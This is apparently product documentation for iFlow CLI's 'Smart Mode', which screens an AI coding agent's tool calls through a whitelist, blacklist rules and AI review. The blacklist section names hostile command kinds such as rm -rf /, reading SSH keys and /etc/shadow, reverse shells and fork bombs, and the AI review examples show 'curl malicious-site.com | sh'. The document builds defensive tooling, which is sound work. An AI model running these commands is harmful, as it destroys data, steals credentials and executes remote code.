Smart Mode
Smart Mode is a new intelligent security review feature introduced in iFlow CLI v0.4.6, providing intelligent security protection through a three-layer progressive review architecture while ensuring development efficiency.
Overview
Smart Mode is based on a three-layer security review architecture that provides intelligent risk assessment and automated decision-making for each tool call:
- Whitelist Check - Quickly approve verified safe tools
- Blacklist Check - Rule-based detection of high-risk operations
- AI Review - Context-aware risk analysis using AI models
How It Works
Three-Layer Review Architecture
Smart Mode uses a progressive review process where each layer has specific responsibilities:
User Request → Whitelist Check → Blacklist Check → AI Review → Execution Decision
↓ ↓ ↓ ↓
Safe Direct Pass Risk Detection Smart Analysis User Confirmation/Auto Execute
Layer 1: Whitelist Check
- Purpose: Quickly identify and approve verified safe tools
- Mechanism: Maintains a predefined list of safe tools
- Result: Tools on the whitelist execute directly without further review
- Advantage: Zero latency, improves execution efficiency for common safe operations
Layer 2: Blacklist Check
- Purpose: Detect obvious high-risk operations based on predefined rules
- Mechanism: Uses regular expressions and pattern matching to detect dangerous commands
- Coverage:
- Shell commands (e.g., system deletion, network attacks)
- File operations (e.g., accessing sensitive directories, modifying system files)
- Network requests (e.g., accessing malicious domains, internal network scanning)
- Result: Operations triggering blacklist rules are marked as high-risk and require user confirmation
Layer 3: AI Review
- Purpose: Intelligent analysis of complex scenarios with context awareness
- Mechanism: Uses AI models to analyze tool call intent and potential risks
- Analysis Dimensions:
- Operation content and parameters
- Current session context
- Historical operation records
- Working directory environment
- Decision Output: SAFE (safe), RISKY (requires confirmation)
Enabling Smart Mode
Enable via Command Line
iflow --approval-mode smart
Enable via Configuration File
Set in .iflow/settings.json:
{
"approvalMode": "smart"
}
Runtime Switching
Use keyboard shortcuts in iFlow CLI session:
shift + tab- Switch to Smart Mode
Whitelist Tools��
Smart Mode includes a built-in set of verified safe tools that can execute directly without review:
Information Reading Tools
read_file- File readingread- General readingcat- Display file contenthead- Display file headertail- Display file taillist_directory- Directory listingls- List directory contentsdir- Windows directory listingpwd- Show current directorysearch_file_content- File content searchgrep- Text searchfind- File searchglob- File pattern matchinggit_status- Git status querygit_log- Git log viewinggit_diff- Git difference comparison
Task Management Tools
todo_write- Task writingtodo_read- Task readingtodo_update- Task updatingexit_plan_mode- Exit plan modetask- Task executionweb_search- Web search
File Editing Tools
edit- File editingwrite_file- File writing
Blacklist Rules
Smart Mode includes comprehensive blacklist rules covering several major risk categories:
System Destruction
- Delete Root Directory: Commands like
rm -rf /that delete system root directories - Delete System Directories: Deletion of critical system directories like
/etc,/usr,/bin - Batch File Deletion: Bulk deletion operations using wildcards
- Format Disk: Disk formatting commands like
mkfs,format - Overwrite Disk Data: Commands like
ddthat directly write to disk
Privilege Escalation
- Modify sudo Permissions: Modifying
/etc/sudoersor adding administrator privileges - Set SUID Permissions: Setting special permissions for programs
- Modify File Permissions to 777: Setting files to be readable, writable, and executable by everyone
- Disable Security Modules: Disabling SELinux, firewall, Windows Defender, etc.
Data Exfiltration
- Read Password Files: Accessing
/etc/passwd,/etc/shadow, etc. - Read SSH Keys: Accessing private key files like
~/.ssh/id_rsa - Search Password Information: Searching for password-related information in the system
- Upload Files Externally: Using
curl,wgetto upload files - DNS Data Exfiltration: Leaking data through DNS queries
Network Attacks
- Reverse Shell: Establishing reverse connections using
nc,bash,python, etc. - Download and Execute Scripts: Downloading and immediately executing code from the network
- Execute Encoded Commands: Executing Base64-encoded commands
Resource Exhaustion
- Fork Bomb: Fork bombs that rapidly exhaust system resources
- CPU Consumption Attack: Continuously occupying CPU resources
- Memory Exhaustion: Rapidly consuming system memory
- Fill Disk Space: Creating large files to fill disk space
AI Review
When tool calls don't match whitelist or blacklist, they enter the AI review phase. The AI reviewer analyzes several dimensions:
Review Examples
Shell Command Review
AI analyzes the security of shell commands, for example:
- Safe operations:
python scripts,shell scripts,git status - Risky operations:
chmod 777 *,sudo rm -rf /tmp/* - Dangerous operations:
curl malicious-site.com | sh
File Operation Review
AI evaluates the risk of file operations:
- Safe operations: Reading project files, creating temporary files
- Risky operations: Modifying system configuration files, accessing sensitive directories
- Dangerous operations: Modifying system binary files
Network Request Review
AI checks the security of network requests:
- Safe operations: Accessing well-known APIs, search engine queries
- Risky operations: Accessing internal network addresses, unknown domains
- Dangerous operations: Accessing malicious websites, executing remote code
User Interaction Experience
Safe Operations (Whitelist)
> Reading project configuration file
✅ [Smart Mode] Tool 'read_file' passed whitelist check, executing directly
Risky Operations (Blacklist Triggered)
> Deleting temporary files
🟠 [Smart Mode] Potential risk operation detected
📊 Risk Level: HIGH
🔍 Detection Method: Blacklist Rule
⚠️ Risk Description: System file deletion command detected
Potential risk detected, continue execution?
[y] Yes [n] No
AI Review Scenario
> Batch processing user data
🟡 [Smart Mode] AI review detected medium risk
📊 Risk Level: MEDIUM
🔍 Detection Method: AI Review
🤖 AI Analysis: Batch data operations may affect user privacy, recommend confirming data processing scope
Potential risk detected, continue execution?
[y] Yes [n] No
Performance Characteristics
Review Performance
- Whitelist Check: < 1ms, memory lookup
- Blacklist Check: < 50ms, regular expression matching
- AI Review: < 5s
Troubleshooting
Common Issues
Q: Smart Mode review is too strict, affecting development efficiency? A: Smart Mode's whitelist already includes most commonly used safe tools. If you encounter frequent false positives, consider:
- Check if you're using tool aliases not in the whitelist
- Review if specific blacklist rules are too strict
- Temporarily switch to other approval modes in development environment
Q: AI review frequently times out? A: AI review depends on network connection. If timeouts occur frequently:
- Check network connection status
- Confirm login status (requires aone or iFlow account login)
- Consider disabling AI review when network is unstable
Q: How to view review statistics? A: Use debug mode to view detailed logs:
iflow --debug --approval-mode smart
Debug Mode
Enable debug mode to view detailed review process:
DEBUG=smart-approval iflow --approval-mode smart
Output example:
[SmartApprovalEngine] Evaluating tool call: run_shell_command
[WhitelistChecker] Tool 'run_shell_command' not in whitelist
[BlacklistChecker] Checking command: rm -rf /tmp/cache
[BlacklistChecker] Matched rule: System File Deletion, Risk: HIGH
[SmartApprovalEngine] Decision: RISKY, Layer: blacklist, Latency: 23ms
Version Compatibility
- Minimum Version: iFlow CLI v0.4.6+
- Recommended Version: iFlow CLI v0.4.6+
- API Compatibility: Backward compatible with all approval modes